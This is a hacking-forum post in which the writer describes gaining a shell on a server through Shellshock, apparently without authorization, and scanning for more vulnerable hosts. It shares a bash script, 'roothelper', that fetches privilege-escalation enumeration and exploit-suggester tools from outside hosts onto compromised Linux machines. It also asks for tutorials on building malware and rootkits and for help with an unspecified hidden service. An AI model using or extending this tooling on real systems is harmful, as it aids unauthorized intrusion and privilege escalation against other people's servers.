Man, I wish I could do that. Hey lock, now that you're here I'd love to see some tech threads penned by you. I don't know if you know this, but you're actually the one that got me interested in infosec way back on Zoklet. With regards to threads, I know you don't like to write really long threads, but if you'd be willing to create some awesome content I'd humbly request it to be on the topics of offensive security or sec-related coding. IDK all the languages you know, but I know you're pretty advanced at bash. I've been looking into bash recently as well. I was playing around with shellshock and got an OS shell on this particular server, so then I wanted to root it like a proper hacker should. I found there were a number of enumeration shell scripts and exploit suggesters out there to run on the compromised machine to get a sense of what you're dealing with. I got a Python script that searches for shellshock-vulnerable hosts, so having to manually 'wget' and unzip all the enumeration and exploit suggestion scripts by hand on each as you're working the hosts would be a drag. So I made a shell script to automate the process.
```bash
#!/bin/bash

# Directory the scripts are downloaded to
dir="/tmp"

# Print the help text
function usage()
{
    printf "%b" "\a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
and exploit suggestion scripts. Below is a quick overview of the available options.
The 'Help' option displays this informational message.
The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead
The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n"
}

# Download
# wget is called directly; wrapping it in backticks would try to run its output as a command
function download()
{
    wget -O "$dir/ExploitSuggest.py" http://www.securitysift.com/download/linuxprivchecker.py
    wget -O "$dir/LinEnum.zip" https://github.com/rebootuser/LinEnum/archive/master.zip
    wget -O "$dir/ExploitSuggest_perl.zip" https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip
    wget -O "$dir/unixprivesc.zip" https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip
}

# Download and unzip
function dzip()
{
    echo "Downloading and extracting scripts..."
    download
    # The archives are in $dir, so the loop has to run there and not in the caller's directory
    cd "$dir" || return 1
    for zip in *.zip
    do
        # Skip the literal '*.zip' when no archive is present
        [ -e "$zip" ] || continue
        dirname="${zip%.zip}"
        if mkdir "$dirname"
        then
            if cd "$dirname"
            then
                unzip "../$zip"
                cd ..
                rm -f "$zip"
            else
                echo "Could not unpack $zip - cd failed"
            fi
        else
            echo "Could not unpack $zip - mkdir failed"
        fi
    done
}

usage
printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"
PS3='Please enter your choice: '
options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "Help")
            usage
            printf "\n"
            ;;
        "Download")
            echo "Downloading scripts to /tmp/"
            download
            printf "\n"
            ;;
        "Download and unzip")
            dzip
            printf "\n"
            ;;
        "Clean up")
            echo "Removing downloaded files"
            # Remove only what this script created, not every file in /tmp
            rm -f "$dir/ExploitSuggest.py"
            for name in LinEnum ExploitSuggest_perl unixprivesc
            do
                rm -rf "$dir/$name" "$dir/$name.zip"
            done
            printf "\n"
            ;;
        "Quit")
            break
            ;;
        *) echo "invalid option";;
    esac
done
```
I want your honest opinion on this. Personally I thought it was pretty useful for us plebs that can't mind meld with the computer. I'd love to know more bash and its application in a security setting. Furthermore, I'm really interested in malware, and not the HunterExploit Kit skidware but homecooked malware of the dankest kind, including rootkits. If you'd be willing to make a thread to grant some insight on these topics I'd be very grateful. Also, an introduction to reverse engineering and exploit development with Immunity Debugger (if you use it) would be greatly appreciated.
Also, Iam asked me to ask you if you'd be interested in setting up a specific kind of hidden service. Thanks man <3